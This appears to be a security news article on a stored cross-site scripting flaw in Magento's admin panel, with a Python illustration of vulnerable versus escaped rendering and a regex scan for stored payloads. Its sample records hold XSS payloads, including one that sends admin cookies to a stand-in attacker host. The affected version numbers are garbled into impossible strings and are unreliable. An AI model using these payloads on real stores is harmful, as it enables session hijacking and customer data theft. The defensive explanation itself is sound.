Thousands of e-commerce sites running Magento are at risk after a critical bug was found in the platform. If you run your stores on Magento, patch as soon as possible to protect them from large-scale attacks.
Stored XSS flaw in Magento: a stored cross-site scripting (XSS) vulnerability exists in all versions of Magento Community Edition 220.127.116.11 and earlier, and in Enterprise Edition 18.104.22.168 and earlier. The consequences of a stored XSS flaw in an administration backend are severe: a payload that an attacker saves into the store's data (for example through a public-facing form) is executed in the browser of whichever administrator later views that record, inside the administrator's authenticated session. Through this flaw an attacker can take over the site via the administrator account, steal credit card information and customer data, and control the Magento-based online store.
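To make the mechanism concrete, here is an added illustration that is not code from the page or from Magento itself (Magento is written in PHP; the example is in Python and models the pattern, not the actual buggy snippet). It assumes a hypothetical admin page that lists customer records, renders a constructed set of records with and without output escaping, and includes a heuristic scan for stored payloads that a practitioner could adapt to check existing data after patching.

```python
import html
import re

# Constructed sample customer records, as an attacker could have stored them
# through a public-facing signup form. These are not real Magento data.
CUSTOMERS = [
    {"id": 1, "email": "alice@example.com", "name": "Alice"},
    {"id": 2,
     "email": '"><script>fetch("https://attacker.invalid/?c="+document.cookie)</script>',
     "name": "Mallory"},
    {"id": 3, "email": "bob@example.com", "name": 'Bob" onmouseover="alert(1)'},
]


def render_unsafe(record):
    """Hypothetical vulnerable admin template: stored values are interpolated verbatim.

    Record 2 breaks out of the href attribute and injects a <script> tag; record 3
    breaks out of the title attribute and adds an event handler.
    """
    return (f'<tr><td>{record["id"]}</td>'
            f'<td><a href="mailto:{record["email"]}">{record["email"]}</a></td>'
            f'<td title="{record["name"]}">{record["name"]}</td></tr>')


def render_safe(record):
    """Hardened form: every stored value is HTML-escaped before it is placed in
    element text or a quoted attribute. quote=True also escapes " and ' so a
    value cannot terminate the attribute it sits in."""
    email = html.escape(record["email"], quote=True)
    name = html.escape(record["name"], quote=True)
    return (f'<tr><td>{record["id"]}</td>'
            f'<td><a href="mailto:{email}">{email}</a></td>'
            f'<td title="{name}">{name}</td></tr>')


# Heuristic for values that should never appear in an e-mail address or a name:
# an HTML tag opener, an inline event handler, or a javascript: URL.
SUSPICIOUS = re.compile(r'<\s*/?\s*[a-z][a-z0-9]*|on[a-z]+\s*=|javascript\s*:',
                        re.IGNORECASE)


def find_suspicious(records):
    """Return (id, field) pairs whose stored value looks like an XSS payload.

    Useful after patching: the fix stops new payloads from executing, but records
    written before the patch are still in the database.
    """
    hits = []
    for record in records:
        for field in ("email", "name"):
            if SUSPICIOUS.search(record[field]):
                hits.append((record["id"], field))
    return hits


def contains_active_markup(fragment):
    """Crude check on rendered HTML: is there still a live <script> tag or an
    unescaped on*="..." handler attribute?"""
    return bool(re.search(r'<script|\son[a-z]+="', fragment, re.IGNORECASE))


if __name__ == "__main__":
    for record in CUSTOMERS:
        print("unsafe:", render_unsafe(record))
        print("safe:  ", render_safe(record))
    print("suspicious stored values:", find_suspicious(CUSTOMERS))
```

The escaping shown is correct only for HTML element text and quoted attribute values; a value placed inside a script block, a URL, or a CSS context needs that context's own encoding, and the regex scan is a triage aid rather than a complete detector.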
According to the Sucuri advisory: "This vulnerability affects almost every install of Magento CE <22.214.171.124 and Magento EE <126.96.36.199. The buggy snippet is located inside Magento core libraries, more specifically within the administrator's backend. Unless you're behind a WAF or you have a very heavily modified administration panel, you're at risk." "As this is a Stored XSS vulnerability, this issue could be used by attackers to take over your site, create new administrator accounts, steal client information, anything a legitimate administrator account is allowed to do."
The vulnerability has since been patched. Tracking newly disclosed bugs and applying fixes promptly is an active security measure, and regular vulnerability testing is needed to keep your sites secure. Note that a WAF in front of the admin panel reduces exposure but does not remove the flaw, and that patching does not undo an earlier compromise: after updating, review the list of administrator accounts for any you did not create and check stored customer data for payloads written before the fix.